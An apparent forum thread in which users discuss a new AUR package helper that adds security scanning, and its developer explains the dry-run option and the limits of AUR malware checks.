gotta assume arch does a cve scan before releasing an update.yours would be a ‘post’ or ‘during’ package scan? The snark in me wants to say overkill but in reality no one would turn down extra security. Interesting.
Even after the github introduction it resembles pacseek.
I like the pkgbuild dealio.
compared to yay and pacseek we can do a lot of these things save a couple…
what about a dry run? that might be interesting.
My hats off to all creators/creatives ( ) may check it out.
As not listed here, a Dry-run is partially implemented (Full implementation planned). As it is more thought of a tool for development dry-run is implemented as an option flag ‘–dry-run’. At the moment the dry-run is only implemented for install/remove packages.
As the AUR is “User maintained” it does not have any checks for new packages. As I am also a new maintainer of packages the only thing that is somewhat of a savety check is the Voting system. And User looking at the PKGBUILD’s.
The problem with this approach is that most of the AUR packages are not voted for (For whatever reason). I think a download counter would also help with security, as you can also look out for downloads, but this also could be manipulated.
I think it is a though situation overall. And as a heavy AUR user myself I want to do something about it. If it’s effective or not, I don’t know yet.
I am no security expert and I am learning each day new ways that may improve the situation, but also have to discard many ideas as they are not effective for the most common malware attack onto the AUR. As a matter of fact I implemented the first tools: ClamAV, TotalVirus, Shellcheck, Trivy and Semgrep-bin, but as I explored the tools further, only shellcheck may be effective for Zero day malware.
ClamAV and TotalVirus are used more for known virus.
) may check it out.